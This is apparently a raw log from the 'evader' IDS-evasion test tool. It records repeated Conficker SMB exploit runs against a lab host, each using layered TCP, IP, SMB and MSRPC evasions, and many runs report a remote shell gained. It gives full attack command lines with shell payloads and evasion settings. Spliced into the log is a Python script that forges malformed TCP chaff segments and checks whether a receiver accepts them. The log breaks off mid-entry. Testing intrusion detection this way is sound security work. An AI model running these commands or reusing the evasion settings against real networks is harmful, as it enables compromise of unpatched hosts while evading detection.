- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39459 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=e7ylkdMUHfM --evasion=[smb_connect,msrpc_bind]tcp_chaff,"50%","chksum|outofwindow|shorthdr","shuffle30" --evasion=[smb_opentree,end]tcp_chaff,"1","chksum|nullchksum|outofwindow|shorthdr|longhdr","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed e7ylkdMUHfN
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - With every TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:39459 -> 10.35.1.207:445
- Terminated
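The tcp_chaff run above lists the defects a chaff segment carries (bad or zero checksum, out-of-window sequence number, a data offset shorter than 20 bytes or longer than the segment, null flags). The receiving host discards each of these before any payload reaches SMB, so an inspection engine has to apply the same acceptance tests or it reassembles chaff bytes in place of the real request. Added example (Python written for this page, not evader code): a builder that forges each defect and a checker that applies header-length, checksum, flag and window tests in the order a host would. Addresses and ports are taken from the log line; sequence numbers, the receive window, the real payload and the chaff payload are constructed.

```python
"""Accept-or-drop checks for TCP chaff segments (added example, not evader output)."""
import struct

FLAG_ACK, FLAG_PSH = 0x10, 0x08


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src_ip, dst_ip, tcp_len):
    return ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 6, tcp_len)


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, payload,
                  doff_words=5, csum_mode="valid"):
    """Build a TCP segment with a 20-byte header. doff_words and csum_mode forge the
    defects named in the log: shorthdr (doff_words < 5), longhdr (doff_words*4 > length),
    chksum (wrong checksum) and nullchksum (checksum field zeroed)."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, doff_words << 4, flags, 65535, 0, 0)
    csum = (~ones_complement_sum(pseudo_header(src_ip, dst_ip, 20 + len(payload)) + hdr + payload)) & 0xFFFF
    if csum_mode == "chksum":
        csum = ((csum + 1) & 0xFFFF) or 1     # guaranteed wrong and non-zero
    elif csum_mode == "nullchksum":
        csum = 0
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def accept_segment(src_ip, dst_ip, segment, rcv_nxt, rcv_wnd):
    """Apply the checks a host applies before payload reaches the application.
    Returns (None, payload) on acceptance, otherwise (reason, b"")."""
    if len(segment) < 20:
        return "truncated", b""
    _, _, seq, _, off, flags, _, _, _ = struct.unpack("!HHIIBBHHH", segment[:20])
    doff = (off >> 4) * 4
    if doff < 20:
        return "shorthdr", b""
    if doff > len(segment):
        return "longhdr", b""
    # Summing the segment with its checksum field included yields 0xFFFF when correct.
    # A zeroed checksum field is simply a wrong checksum in TCP (unlike UDP).
    if ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) != 0xFFFF:
        return "chksum", b""
    if flags == 0:
        return "nullflag", b""
    if not (rcv_nxt <= seq < rcv_nxt + rcv_wnd):    # RFC 793 window test, wrap-around ignored
        return "outofwindow", b""
    return None, segment[doff:]


SRC, DST = "10.62.90.115", "10.35.1.207"     # addresses from the log line above
SPORT, DPORT = 39459, 445
RCV_NXT, RCV_WND = 1000, 65535                # constructed receiver state after the handshake
REAL_PAYLOAD = b"\x05\x00\x00\x03exploit-request-stub"   # constructed stand-in for the MSRPC request
JUNK = b"A" * len(REAL_PAYLOAD)


def make_wire():
    """One chaff segment per defect, each sent ahead of the real segment."""
    base = dict(seq=1000, ack=2000, flags=FLAG_PSH | FLAG_ACK, payload=JUNK)

    def seg(**kw):
        return build_segment(SRC, DST, SPORT, DPORT, **{**base, **kw})

    return [
        ("chksum", seg(csum_mode="chksum")),
        ("nullchksum", seg(csum_mode="nullchksum")),
        ("shorthdr", seg(doff_words=4)),
        ("longhdr", seg(doff_words=15)),
        ("nullflag", seg(flags=0)),
        ("outofwindow", seg(seq=1000 + 70000)),
        ("real", seg(payload=REAL_PAYLOAD)),
    ]


def inspect(wire):
    """Return the verdict per segment and the bytes that actually reach the application."""
    verdicts, accepted = [], b""
    for label, segment in wire:
        reason, payload = accept_segment(SRC, DST, segment, RCV_NXT, RCV_WND)
        verdicts.append((label, reason))
        accepted += payload
    return verdicts, accepted


if __name__ == "__main__":
    verdicts, accepted = inspect(make_wire())
    for label, reason in verdicts:
        print(f"{label:12s} -> {'accepted' if reason is None else 'dropped: ' + reason}")
    print("application sees:", accepted)
```

The window test here is the plain RFC 793 acceptance check without wrap-around handling; a faithful engine also mirrors the target's ACK, PAWS and RST handling, and those rules differ between Windows and Linux versions, so the policy has to be keyed to the target OS. The log's "SMB Native OS is Windows 5.1" line is the kind of fingerprint you would key it on.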
- .Pid 1876 timed out - killed
- 2015-06-07 23:30:11 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12116 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=GT8tDxBjFyg --evasion=[start,smb_connect]ipv4_opt,"1","inc","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed GT8tDxBjFyg
- The following evasions are applied from stage start to smb_connect:
- - Every IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random urgent data byte to every TCP segment.
- Info: NetBIOS connection 10.62.90.114:12116 -> 10.35.1.207:445
- Terminated
- .......
- 1238 runs averaging 1.92 runs / second ; progress: 644/43200...Pid 1971 timed out - killed
- 2015-06-07 23:30:16 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43442 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=HPkkhP7YkHU --evasion=[smb_openpipe,msrpc_bind]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed HPkkhP7YkHU
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2nd TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.111:43442 -> 10.35.1.207:445
- Terminated
- ....2015-06-07 23:30:18 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46188 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=1HDuHIYDD40 --evasion=[start,end]tcp_paws,"50%","9","random_alphanum" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 1HDuHIYDD43
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.115:46188 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 1253 runs averaging 1.93 runs / second ; progress: 649/43200................
- 1269 runs averaging 1.94 runs / second ; progress: 654/43200...............
- 1284 runs averaging 1.95 runs / second ; progress: 659/43200....................
- 1304 runs averaging 1.96 runs / second ; progress: 664/43200............
- 1316 runs averaging 1.97 runs / second ; progress: 669/43200............
- 1328 runs averaging 1.97 runs / second ; progress: 674/43200..............
- 1342 runs averaging 1.97 runs / second ; progress: 680/43200..............
- 1356 runs averaging 1.98 runs / second ; progress: 685/43200
- 2015-06-07 23:30:55 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24700 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=NCyRKw2M+QU --evasion=[start,netbios_connect]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","110160382","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed NCyRKw2M+QU
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 1464 bytes per fragment
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 110160382> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.114:24700 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .............
- 1370 runs averaging 1.99 runs / second ; progress: 690/43200........
- 1378 runs averaging 1.98 runs / second ; progress: 695/43200............
- 1390 runs averaging 1.99 runs / second ; progress: 700/43200............
- 1402 runs averaging 1.99 runs / second ; progress: 705/43200.......
- 1409 runs averaging 1.99 runs / second ; progress: 710/43200.............
- 1422 runs averaging 1.99 runs / second ; progress: 715/43200...........
- 1433 runs averaging 1.99 runs / second ; progress: 720/43200.........
- 1442 runs averaging 1.99 runs / second ; progress: 725/43200....
- 1446 runs averaging 1.98 runs / second ; progress: 730/43200.......
- 1453 runs averaging 1.98 runs / second ; progress: 735/43200........
- 1461 runs averaging 1.98 runs / second ; progress: 740/43200.2015-06-07 23:31:50 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24569 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2cSDsed3ITE --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed 2cSDsed3ITH
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 3rd IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.114:24569 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 1468 runs averaging 1.97 runs / second ; progress: 745/43200...2015-06-07 23:31:57 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64502 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=yxKHXWbMZgw --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"add_null_trailer" --evasion=[start,end]tcp_paws,"50%","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed yxKHXWbMZgz
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - The SMB filename is obfuscated:
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.111:64502 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 1483 runs averaging 1.98 runs / second ; progress: 750/43200.....
- 1488 runs averaging 1.97 runs / second ; progress: 755/43200....
- 1492 runs averaging 1.96 runs / second ; progress: 760/43200.2015-06-07 23:32:11 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45139 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=dzj0POWrydM --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","6","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed dzj0POWrydN
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3rd TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.115:45139 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 1502 runs averaging 1.96 runs / second ; progress: 765/43200....
- 1506 runs averaging 1.96 runs / second ; progress: 770/43200
- Pid 3944 timed out - killed
- 2015-06-07 23:32:22 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42916 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=BSmDZs2V2KY --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed BSmDZs2V2KY
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random urgent data byte to every 2nd TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * Unspecified character encoding
- * IBM floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.116:42916 -> 10.35.1.207:445
- Terminated
- 1507 runs averaging 1.94 runs / second ; progress: 775/43200.
- 1508 runs averaging 1.93 runs / second ; progress: 780/43200.........
- 1517 runs averaging 1.93 runs / second ; progress: 785/43200.......
- 1524 runs averaging 1.93 runs / second ; progress: 790/43200.......
- 1531 runs averaging 1.93 runs / second ; progress: 795/43200...
- 1534 runs averaging 1.92 runs / second ; progress: 800/43200.
- 1535 runs averaging 1.91 runs / second ; progress: 805/43200
- Pid 4544 timed out - killed
- 2015-06-07 23:32:56 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52467 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=4ftBvYDCVZs --evasion=[netbios_connect,end]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 4ftBvYDCVZv
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random urgent data byte to every TCP segment.
- Info: NetBIOS connection 10.62.90.118:52467 -> 10.35.1.207:445
- Terminated
- ....
- 1540 runs averaging 1.90 runs / second ; progress: 810/43200......
- 1546 runs averaging 1.90 runs / second ; progress: 815/43200......
- 1552 runs averaging 1.89 runs / second ; progress: 820/43200......
- 1558 runs averaging 1.89 runs / second ; progress: 825/43200.....
- 1563 runs averaging 1.88 runs / second ; progress: 830/43200..
- 1565 runs averaging 1.87 runs / second ; progress: 835/43200
- 1565 runs averaging 1.86 runs / second ; progress: 840/43200.......
- 1572 runs averaging 1.86 runs / second ; progress: 845/43200
- Pid 5247 timed out - killed
- 2015-06-07 23:33:36 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15300 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=hPpd4kR6QYQ --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed hPpd4kR6QYS
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alpha urgent data byte to every 2nd TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.117:15300 -> 10.35.1.207:445
- Terminated
- ....2015-06-07 23:33:38 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43645 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=NWacMXl/kLk --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"21","chksum|nullflag|shorthdr|longhdr","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","128119346","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed NWacMXl/kLk
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3rd TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 128119346> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - With every 21st TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.117:43645 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 1583 runs averaging 1.86 runs / second ; progress: 850/43200..Pid 5416 timed out - killed
- 2015-06-07 23:33:42 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30642 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=QbaOab59OMc --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_chaff,"50%","chksum|nullflag|outofwindow","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed QbaOab59OMd
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - With every 21st TCP packet a TCP chaff packet is sent. The chaff packet has:
- * An out-of-window sequence number.
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- The following evasions are applied from stage smb_openpipe to end:
- - Add a zero urgent data byte to every TCP segment.
- Info: NetBIOS connection 10.62.90.110:30642 -> 10.35.1.207:445
- Terminated
- ......
- 1592 runs averaging 1.86 runs / second ; progress: 855/43200..2015-06-07 23:33:46 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17668 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=No54XXttjfs --evasion=[start,end]tcp_initialseq,"3" --evasion=[smb_opentree,end]tcp_paws,"50%","8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed No54XXttjfs
- - Initial TCP sequence number is set to 0xffffffff - 3
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.110:17668 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 1606 runs averaging 1.87 runs / second ; progress: 860/43200............
- 1618 runs averaging 1.87 runs / second ; progress: 866/43200.....
- 1623 runs averaging 1.86 runs / second ; progress: 871/43200
- 1623 runs averaging 1.85 runs / second ; progress: 876/43200.....
- 1628 runs averaging 1.85 runs / second ; progress: 881/43200............
- 1640 runs averaging 1.85 runs / second ; progress: 886/43200......
- 1646 runs averaging 1.85 runs / second ; progress: 891/43200...
- 1649 runs averaging 1.84 runs / second ; progress: 896/43200.........
- 1658 runs averaging 1.84 runs / second ; progress: 901/43200...........2015-06-07 23:34:35 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59061 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Jtc7r4XedFw --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","6","2","random_msrpcreq" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed Jtc7r4XedFw
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_opentree to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.111:59061 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 1671 runs averaging 1.85 runs / second ; progress: 906/43200.................
- 1688 runs averaging 1.85 runs / second ; progress: 911/43200
- Pid 5990 timed out - killed
- 2015-06-07 23:34:41 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58631 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zh+fzTjgSBM --evasion=[smb_connect,end]netbios_chaff,"25%","small_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed zh+fzTjgSBP
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is:
- * a small NetBIOS message of an unspecified type
- * an unspecified NetBIOS message with HTTP GET request like payload
- * an unspecified NetBIOS message with HTTP POST request like payload
- * an unspecified NetBIOS message with a small payload and an invalid length value
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a random alpha urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:58631 -> 10.35.1.207:445
- Terminated
- ...............
- 1704 runs averaging 1.86 runs / second ; progress: 916/43200
- 2015-06-07 23:34:46 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37611 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=O/Vg484ppb0 --evasion=[smb_connect,msrpc_bind]ipv4_frag,"192" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","6","shuffle" --evasion=[smb_opentree,smb_openpipe]tcp_segvar,"1577","40367" --verifydelay=1000 --payload=shell
- Info: Using random seed O/Vg484ppb0
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - IPv4 fragments with at most 192 bytes per fragment
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP packets are segmented to contain between 1577 and 40367 bytes of payload.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.112:37611 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 1716 runs averaging 1.86 runs / second ; progress: 921/43200.......
- 1723 runs averaging 1.86 runs / second ; progress: 926/43200............
- 1735 runs averaging 1.86 runs / second ; progress: 931/43200...............
- 1750 runs averaging 1.87 runs / second ; progress: 936/43200................
- 1766 runs averaging 1.88 runs / second ; progress: 941/43200....2015-06-07 23:35:13 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34997 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=If/m9xhogZo --evasion=[netbios_connect,smb_opentree]ipv4_opt,"8","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","267969810","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed If/m9xhogZo
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 267969810> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.116:34997 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .....
- 1776 runs averaging 1.88 runs / second ; progress: 946/43200................2015-06-07 23:35:21 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31846 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=g+Vl2tI+pn8 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","1723","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed g+Vl2tI+pn+
- The following evasions are applied from stage smb_connect to end:
- - Before every 21st SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1723 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.111:31846 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 1794 runs averaging 1.89 runs / second ; progress: 951/43200..................
- 1812 runs averaging 1.90 runs / second ; progress: 956/43200.........
- 1821 runs averaging 1.89 runs / second ; progress: 961/43200..2015-06-07 23:35:34 INFO
- Success. (10.62.90.111):
